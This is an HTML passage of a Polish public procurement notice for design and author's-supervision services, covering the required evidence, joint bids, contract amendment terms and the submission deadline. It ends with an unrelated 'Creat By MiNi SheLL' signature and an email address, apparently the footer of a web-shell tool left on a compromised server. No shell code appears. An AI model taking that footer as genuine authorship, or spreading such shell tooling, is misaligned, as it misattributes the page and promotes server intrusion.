class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy – wg załącznika nr 5 SWZ. <br/>Uwaga! Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, wówczas w powyższym wykazie usług zobowiązany jest podać jedynie te usługi w których wykonaniu wykonawca ten bezpośrednio uczestniczył. <br/>2)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – wg załącznika nr 6 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zgodnie z art. 117 ust. 4 ustawy Pzp dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. <br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość wprowadzenia zmian do niniejszej Umowy polegających na: <br/>1)	zmianie terminu wykonania przedmiotu niniejszej umowy; <br/>2)	zmianie wynagrodzenia umownego; <br/>3)	zmianie zakresu przedmiotu niniejszej umowy; <br/>4)	zmianie składu zespołu projektantów, o których mowa w §3 ust. 3 niniejszej umowy. <br/>2.	Zmiana terminu wykonania przedmiotu umowy określonego w ust. 1 niniejszej umowy będzie możliwa, jeżeli: <br/>1)	pomimo dołożenia należytej staranności i wystąpienia z odpowiednim wyprzedzeniem, Projektant nie uzyska uzgodnień, opinii, warunków technicznych lub decyzji pozwalających wykonać w terminie przedmiot niniejszej umowy; <br/>2)	nastąpi zmiana stanu prawnego lub powszechnie obowiązujących przepisów prawa, mająca wpływ na realizację przedmiotu niniejszej umowy; <br/>3)	wystąpi konieczność: zmiany zakresu przedmiotu niniejszej umowy lub wykonania prac dodatkowych lub uwzględnienia wpływu innych przedsięwzięć i działań powiązanych z przedmiotem niniejszej umowy. <br/>3.	Termin wykonania niniejszej umowy w zakresie sprawowania nadzoru autorskiego określonego w <br/>§11 ust. 2 niniejszej umowy może ulec zmianie w zależności od terminu: przekazania placu budowy <br/>lub terminu wykonania robót budowlanych lub terminu podpisania protokołu odbioru końcowego robót. <br/>4.	Zmiana wynagrodzenia umownego będzie możliwa w następujących przypadkach: <br/>1)	nastąpi zmiana przepisów wskazanych w art. 142 ust. 5 ustawy pzp; <br/>2)	nastąpi konieczność zmiany zakresu przedmiotu niniejszej umowy, wykonania prac dodatkowych, konieczność uwzględnienia wpływu innych przedsięwzięć nie wymienionych w SWZ, działań powiązanych z przedmiotem niniejszej umowy, bądź konieczność zaniechania części prac. <br/>W tym przypadku Projektant przedłoży wycenę prac projektowych sporządzoną w oparciu o Środowiskowe Zasady Wycen Prac Projektowych (wydanie aktualne na dzień sporządzenia) uwzględniającą aktualną na dany rok stawką za umowną jednostkę nakładu pracy. Wycena podlega akceptacji Zamawiającego. <br/>3) w przypadku konieczności sprawowania nadzoru autorskiego w czasie dłuższym lub krótszym, niż planowany okres 10 kwartałów. W tym przypadku zmienione wynagrodzenie zostanie wprowadzone aneksem do niniejszej umowy przy zastosowaniu ceny jednostkowej ryczałtowej za jeden rozpoczęty miesiąc sprawowania nadzoru, wyliczony poprzez podzielenie na 3 ceny ryczałtowej za 1 kwartał, określonej zgodnie z zapisami § 13 ust. 7 pkt 1. <br/>5.	W przypadku zmiany, o której mowa w art. 142 ust. 5 pkt 1 ustawy pzp wartość netto dotychczas niezafakturowanego wynagrodzenia Projektanta nie zmieni się, a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów. <br/>6.	W przypadku zmiany, o której mowa w art. 142 ust. 5 pkt 2 i 3 ustawy pzp, strony podejmą negocjacje mające na celu ustalenie nowego wynagrodzenia projektanta. Zwiększenie wynagrodzenia nie może być wyższe niż koszty Wykonawcy wynikające ze zmiany przepisów o których mowa w art. 142 ust. 2 pkt 2 i 3 ustawy Pzp. Udowodnienie, że zmiana przepisów ma wpływ na koszt realizacji umowy leży po stronie Wykonawcy. <br/>7.	Zmiana wysokości wynagrodzenia, o której mowa w art. 142 ust. 5 ustawy pzp obowiązywać będzie od podpisania aneksu i będzie obejmować wyrównanie za okres od dnia wejścia w życie zmian, o których mowa w ust. 8 niniejszego paragrafu. <br/>8.	Za wyjątkiem sytuacji, o której mowa w ust. 9 niniejszego paragrafu, wprowadzenie zmian wysokości wynagrodzenia wymaga uprzedniego złożenia przez Projektanta oświadczenia wraz z uzasadnieniem oraz odpowiednimi dowodami potwierdzającymi wpływ zmian, o których mowa w ust. 11 niniejszego paragrafu na wynagrodzenie Projektanta. <br/>9.	Zmiana zakresu przedmiotu niniejszej umowy będzie możliwa w następujących przypadkach: <br/>1)	wystąpi konieczność uwzględnienia wpływu innych przedsięwzięć, działań powiązanych z przedmiotem niniejszej umowy; <br/>(...) pozostałe zapisy , o których<br/>mowa w paragrafie18 Załącznika nr 10 do SWZ Projektowane<br/>Postanowienia Umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-01-03 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy pod adresem , https://ezamówienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-01-03 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com